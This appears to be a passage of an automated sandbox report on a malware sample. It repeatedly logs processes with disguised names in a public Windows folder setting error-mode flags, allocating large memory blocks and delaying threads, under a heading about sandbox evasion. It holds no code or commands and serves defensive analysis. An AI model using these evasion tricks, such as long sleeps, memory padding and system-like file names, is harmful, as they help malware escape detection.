              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\xzeheenC.pifProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Allocates many large memory junks
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2980000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2981000 memory commit 500178944
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29AC000 memory commit 500002816
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29AD000 memory commit 500199424
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29DE000 memory commit 501014528
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD6000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AD8000 memory commit 500015104
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2990000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2991000 memory commit 500178944
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29BC000 memory commit 500002816
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29BD000 memory commit 500199424
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 29EE000 memory commit 501014528
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AE6000 memory commit 500006912
              Source: C:\Users\Public\Libraries\Cneehezx.PIFMemory allocated: 2AE8000 memory commit 500015104
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 28F0000 memory commit 500006912Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 28F1000 memory commit 500178944Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 291C000 memory commit 500002816Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 291D000 memory commit 500199424Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 294E000 memory commit 501014528Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 2A46000 memory commit 500006912Jump to behavior
              Source: C:\Users\Public\Libraries\spoolsv.COMMemory allocated: 2A48000 memory commit 500015104Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 2B2E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 2B590000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 2D590000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 30A40000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 32960000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 327B0000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 221F0000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 22780000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifMemory allocated: 22490000 memory reserve | memory write watch
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599888Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599769Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599644Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599519Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599394Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599269Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599150Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599034Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598909Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598784Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598659Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598534Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598409Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598284Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598159Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598023Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597906Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597716Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597596Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596722Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596597Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595722Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595597Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594722Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594610Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594472Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594347Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594222Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594097Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593972Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 593847Jump to behavior
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599890
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599781
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599672
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599562
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599453
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599343
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599234
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599125
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599015
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598906
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598797
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598687
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598578
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598468
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598355
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598250
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598140
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 598031
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597922
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597812
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597703
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597593
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597484
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597375
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597265
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597156
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 597047
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596937
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596828
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596718
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596609
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596500
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596390
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596281
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596172
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 596062
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595953
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595843
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595733
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595624
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595515
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595406
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595297
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595187
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 595078
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594968
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594859
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594750
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 594640
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 922337203685477
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 600000
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599891
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599782
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599657
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599547
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599438
              Source: C:\Users\Public\Libraries\xzeheenC.pifThread delayed: delay time: 599313
